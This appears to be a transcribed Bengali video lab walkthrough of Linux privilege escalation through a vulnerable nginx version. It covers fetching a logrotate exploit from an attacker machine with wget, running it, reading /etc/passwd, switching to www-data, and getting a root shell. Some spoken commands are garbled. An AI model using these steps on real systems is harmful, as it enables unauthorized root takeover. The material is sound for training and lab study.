সার্ভিস এক্সপ্লয়েট বাই ভালনারেবল সার্ভিস। তো এই ল্যাবটি করার জন্য আমরা আমাদের ভালনারেবল লিনাক্স প্রিভিলেজ এসকেলেশন মেশিনের টার্মিনালে চলে আসব এবং রানিং প্রসেস সার্ভিস লিস্ট জানতে পিএস টাইপ করে এন্টার দিব। দেখতে পাচ্ছেন আমাদের লোকাল ইউজারের প্রসেসে ব্যাশ এবং পিএস সার্ভিস রানিং আছে। আমরা যদি সিস্টেমের রুট বা অ্যাডমিন ইউজারের রানিং প্রসেস সার্ভিস লিস্ট দেখতে চাই, সেই ক্ষেত্রে টাইপ করব ps aux পাইপ সাইন দেন গ্রিপ ডাবল কোটেশন সাইন দেন ক্যারেট সাইন রুট লিখে ডাবল কোটেশন সাইন দিয়ে এন্টার দিব। দেখতে পাচ্ছেন আমাদের রুট ইউজারের ব্যবহৃত সার্ভিস লিস্ট। তো এই লিস্ট থেকে আমাদের ভালনারেবল সার্ভিস খুঁজে বের করতে হবে। তো এক্সাম্পল হিসেবে আমরা নেক্সিনেক্স সার্ভিসটিকে সিলেক্ট করছি। যে কোনো সার্ভিসের ভালনারেবিলিটি খুঁজে বের করার জন্য তার ভার্সন নাম্বার জানা জরুরি, তাই শুরুতেই আমরা নেক্সিনেক্সের ভার্সন খুঁজে বের করতে টার্মিনাল থেকে টাইপ করব nexinx-v। দেখতে পাচ্ছেন এই হচ্ছে এই সিস্টেমে ইউজ করা নেক্সিনেক্সের ভার্সন। তো এই ভার্সনের নেক্সিনেক্স সার্ভিস অ্যাকচুয়ালি ভালনারেবল কিনা তা জানতে ভার্সন নাম্বারটি কপি করে গুগল করব। দেখতে পাচ্ছেন এখানে একাধিক এক্সপ্লয়েট শো করতেছে। তো আমরা যদি এক্সপ্লয়েট ডিবিতে থাকা লগ রোটেট এক্সপ্লয়েটটি ওপেন করি, দেখতে পাচ্ছেন এটি লিনাক্স প্রিভিলেজ এসকেলেশনের জন্য ইউজ করা হয়। তো এই এক্সপ্লয়েটটি ডাউনলোড করতে ডাউনলোড অপশনে ক্লিক করব। দেখতে পাচ্ছেন আমাদের এক্সপ্লয়েটটি ডাউনলোড হয়েছে, যা একটি শেল স্ক্রিপ্ট ফাইল। শুরুতেই এটিকে ট্রান্সফার করে নিতে অ্যাটাকার মেশিনের এক্সপ্লয়েট ফাইল লোকেশন থেকে python3-m http.server পোর্ট নাম্বার দিয়ে এন্টার দিচ্ছি। ট্রান্সফারের জন্য ifconfig টাইপ করে আমাদের অ্যাটাকার মেশিনের আইপি চেক করে নিব। তো এই হচ্ছে আমাদের অ্যাটাকার মেশিন আইপি। দেন ভালনারেবল লিনাক্স প্রিভিলেজ এসকেলেশন মেশিনের টার্মিনালে ফিরে এসে এক্সপ্লয়েট ফাইলটি এখানে ডাউনলোড করতে টাইপ করব wget http clone /attacker machine ip clone পোর্ট নাম্বার /exploit ফাইল নেম দিয়ে এন্টার দিব। দেখতে পাচ্ছেন আমাদের সার্ভিস এক্সপ্লয়েট ফাইলটি এখানে ডাউনলোড হয়ে গিয়েছে। তো এটিকে এক্সিকিউট করার জন্য পারমিশন চেঞ্জ করতে হবে, তাই টার্মিনাল থেকে টাইপ করব chmod 777 দিয়ে এক্সপ্লয়েট ফাইলটির নেম দিয়ে এন্টার দিব। এটিকে এক্সিকিউট করতে // দিয়ে এক্সপ্লয়েট ফাইলটির নেম দিয়ে এন্টার দিব। দেখতে পাচ্ছেন এখানে একটি ইরর শো করছে। তো এই ইররটির সলিউশন পেতে আমরা ইররটি কপি করে গুগলে সার্চ করব। এখানে অনেক সলিউশন শো করছে। তো আমরা শুরুর সাইটটিতে চলে যাব এবং নিচে আসলে দেখতে পাচ্ছেন এখানে একটি সলিউশন দেওয়া আছে। তো আমরা সলিউশনটি কপি করে নিব এবং টার্মিনালে এসে পেস্ট করে দিয়ে এক্সপ্লয়েট ফাইলটির নেম দিয়ে এন্টার দিব। দেন আবারও এক্সপ্লয়েট ফাইলটিকে এক্সিকিউট করতে // দিয়ে এক্সপ্লয়েট ফাইলটির নেম দিয়ে এন্টার দিব। দেখতে পাচ্ছেন আমাদের এক্সপ্লয়েটটি ইরর লগ নামের একটি ফাইল ক্রিয়েট করেছে। এটি যেহেতু নেক্সিনেক্স বেসড এক্সপ্লয়েট, তাই ইরর লগটি অবশ্যই নেক্সিন সার্ভিসের মধ্যেই ক্রিয়েট হয়েছে। তো নেক্সিনেক্স সার্ভিসের ডিরেক্টরি খুঁজতে টার্মিনাল থেকে টাইপ করব লোকেট নেক্সিনেক্স। দেখতে পাচ্ছেন এই হচ্ছে আমাদের নেক্সিনেক্স ডিরেক্টরি। নেক্সিনেক্স সার্ভিস ডিরেক্টরিতে যেতে আমরা প্যাথ লোকেশনটি কপি করে নিব এবং সিডি টাইপ করে নেক্সিনেক্স সার্ভিসের প্যাথ লোকেশন পেস্ট করে এন্টার দিব। দেখতে পাচ্ছেন আমাদের লোকাল ইউজারের নেক্সিনেক্স সার্ভিস অ্যাক্সেস পারমিশন নেই, তাই পারমিশন ডিনাই দেখাচ্ছে। এমন সিচুয়েশনে আপনাকে জানতে হবে এই সিস্টেমে কি কি ইউজার আছে। ইউজার সম্পর্কে জানতে টাইপ করব cat/etc/pathwd। দেখতে পাচ্ছেন এখানে আমাদের সিস্টেমের সকল ইউজারের ইনফরমেশন শো করছে। লক্ষ্য করুন এখানে www-data নামের একটি ইউজার আছে। অ্যাকচুয়ালি যে কোনো অ্যাপ্লিকেশন সার্ভার রিলেটেড সার্ভিস যেমন অ্যাপাচি, নেক্সিনেক্স, IIS, লাইটস্পিড এইগুলো সিস্টেম রুট ইউজার সহ www-data ইউজার দ্বারা কন্ট্রোল করা হয়। আমাদের যেহেতু রুট ইউজারে যাওয়ার পারমিশন নেই,
তাই আমরা www-data ইউজারে প্রবেশ করার ট্রাই করে দেখব। তাই টার্মিনাল থেকে su www-data লিখে ইন্টার দিলে দেখতে পাচ্ছেন আমাদের কাছে পাসওয়ার্ড চাইছে। তো পাসওয়ার্ড হিসেবে আমরা লোকাল ইউজারের পাসওয়ার্ড 123 দিচ্ছি। এখন যদি আমরা who am I টাইপ করে দেখি, দেখতে পাচ্ছেন এখন আমরা www-data ইউজার হিসেবে লগ ইন আছি। আমরা Naginex সার্ভিসের ডিরেক্টরি খুঁজতে টার্মিনাল থেকে টাইপ করব লোকেট Naginex। দেখতে পাচ্ছেন এই হচ্ছে আমাদের Naginex ডিরেক্টরি। Naginex সার্ভিস ডিরেক্টরিতে যেতে আমরা সার্ভিস প্যাথ লোকেশনটি কপি করে নিব এবং সিডি টাইপ করে Naginex সার্ভিসের প্যাথ লোকেশন পেস্ট করে ইন্টার দিব। দেন এখানের ফাইল সমূহ দেখতে ls টাইপ করে ইন্টার দিচ্ছি। দেখতে পাচ্ছেন এখানে error.log নামের একটি ফাইল আছে। অ্যাকচুয়ালি এই ফাইলটি আমাদের Naginex এর এক্সপ্লয়েট থেকে ক্রিয়েট হয়েছিল। তো এটিকে মিস ইউজ করতে আমাদের Naginex এক্সপ্লয়েটটি আবারও প্রয়োজন হবে। তাই সিডি টাইপ করে Naginex এক্সপ্লয়েটের ডিরেক্টরিতে চলে আসব এবং এটিকে এক্সিকিউট করতে // দিয়ে এক্সপ্লয়েট ফাইলটির নেম দিব, সাথে আমাদের Naginex এর error.log ফাইলটি যেখানে রাখা আছে তার লোকেশন বা ফাইল প্যাথ দিয়ে ইন্টার দিব। দেখতে পাচ্ছেন আমাদের এক্সপ্লয়েটটি আবারও এক্সিকিউট হয়েছে, কিন্তু এখন সে একটি নতুন শেল ওপেন করেছে। আপনাদের বোঝার সুবিধার্থে আমরা আইডি টাইপ করে ইন্টার দিচ্ছি। দেখতে পাচ্ছেন আমরা এই সিস্টেমের রুট ইউআইডি এবং রুট ইউজার গ্রুপে সাকসেসফুলি অ্যাক্সেস পেয়েছি। তো এইভাবে একজন অ্যাটাকার লিনাক্স অপারেটিং সিস্টেমের সার্ভিস ভার্সনের ভালনারেবিলিটি মিস ইউজ করে তা দিয়ে লিনাক্স অপারেটিং সিস্টেমের রুট কন্ট্রোল নিয়ে নেয়